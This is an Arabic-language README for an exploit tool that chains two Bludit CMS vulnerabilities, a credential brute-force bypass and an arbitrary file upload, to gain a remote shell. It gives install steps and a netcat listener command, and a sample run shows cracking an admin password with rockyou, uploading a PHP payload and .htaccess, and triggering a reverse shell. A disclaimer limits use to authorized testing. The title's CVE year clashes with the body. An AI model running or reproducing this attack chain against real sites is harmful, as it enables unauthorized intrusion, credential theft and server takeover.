
cve-2016-16113
_ _____ ___ _
__| |___ /_ ___ __ / _ \ _ __ ___ (_)
/ _` | |_ \ \ / / '_ \| | | | '_ ` _ \| |
| (_| |___) \ V /| | | | |_| | | | | | | |
\__,_|____/ \_/ |_| |_|\___/|_| |_| |_|_|
أداة استغلال آلية تجمع بين CVE-2019-17240 (تجاوز المصادقة) و CVE-2019-16113 (رفع ملف عشوائي) لتحقيق تنفيذ تعليمات برمجية عن بُعد على تركيبات Bludit CMS القابلة للاستغلال.
للاستخدام في الاختبارات الأمنية المصرح بها فقط
هذه الأداة مخصصة لمحترفي الأمن الذين يقومون بإجراء اختبارات اختراق مصرح بها وللباحثين في مجال الأمن الذين يعملون ضمن الحدود القانونية. الوصول غير المصرح به لأنظمة الكمبيوتر غير قانوني بموجب قوانين مثل قانون الاحتيال وإساءة استخدام الكمبيوتر (CFAA) في الولايات المتحدة وتشريعات مماثلة في جميع أنحاء العالم.
باستخدام هذه الأداة، فإنك توافق على:
المؤلف لا يتحمل أي مسؤولية ولا يكون مسؤولاً عن أي سوء استخدام أو ضرر ناتج عن هذه الأداة.
يعمل هذا الاستغلال على أتمتة عملية:
الإصدارات المتأثرة: Bludit CMS الإصدارات 3.9.2 وما دون
requests# استنساخ المستودع
git clone https://github.com/yourusername/get-rce.git
cd get-rce
# تثبيت التبعيات
pip install -r requirements.txt
requirements.txt:
requests>=2.25.0
python3 get_rce.py
سيطلب منك السكريبت:
https://target.com)قبل تشغيل الاستغلال، قم بإعداد مستمع netcat:
nc -lvnp 4444
استبدل 4444 بالمنفذ الذي تختاره.
$ python3 get_rce.py
Enter target URL (i.e. https://target.com): http://10.10.10.191
[ ~ ] Enter listener's IP: 10.10.14.5
[ ~ ] Enter listener's port: 4444
[...] Checking if the target is live...
[ + ] The target is live! We are good to go...
[ ~ ] Should I bruteforce username? [Y/N]: N
[ ~ ] What username should I use? (leave this to use admin as username):
[...] We are gonna default to 'admin' as username.
[ ~ ] Enter the location for password list: /usr/share/wordlists/rockyou.txt
[ * ] Tried: 123456
[ * ] Tried: password
[ * ] Tried: 12345678
...
[ + ] Creds found: admin:Password123
[ + ] Login succeed... We are good to go :)
[ + ] The payload XyZaBcDeFg.php has been uploaded...
[ + ] The payload .htaccess has been uploaded...
[...] Attempting to get a shell... @ http://10.10.10.191/bl-content/tmp/XyZaBcDeFg.php
[ + ] You should be getting a shell by now, if not open http://10.10.10.191/bl-content/tmp/XyZaBcDeFg.php
Should I bruteforce username? [Y/N]: N
What username should I use?: admin
Enter the location for password list: /path/to/passwords.txt
Should I bruteforce username? [Y/N]: Y
Enter the location for username wordlist: /path/to/usernames.txt
Enter the location for password wordlist: /path/to/passwords.txt
SecLists: https://github.com/danielmiessler/SecLists
SecLists/Usernames/Names/names.txtSecLists/Passwords/Common-Credentials/10-million-password-list-top-1000.txtRockYou: /usr/share/wordlists/rockyou.txt (Kali Linux)
X-Forwarded-For لتجاوز الحد من المعدل/bl-content/tmp/.htaccess لضمان التنفيذإذا كنت مسؤول نظام:
/bl-content/tmp/ بحثاً عن ملفات مشبوهةمشكلة: "يبدو أن الهدف غير متصل"
مشكلة: "فشل تسجيل الدخول"
مشكلة: "لم يتم استلام أي shell"
d3vn0mi
هذا المشروع مقدم لأغراض تعليمية واختبارات أمنية مصرح بها فقط. راجع إخلاء المسؤولية في أعلى ملف README هذا.
المساهمات والمشكلات وطلبات الميزات مرحب بها! لا تتردد في زيارة صفحة المشكلات.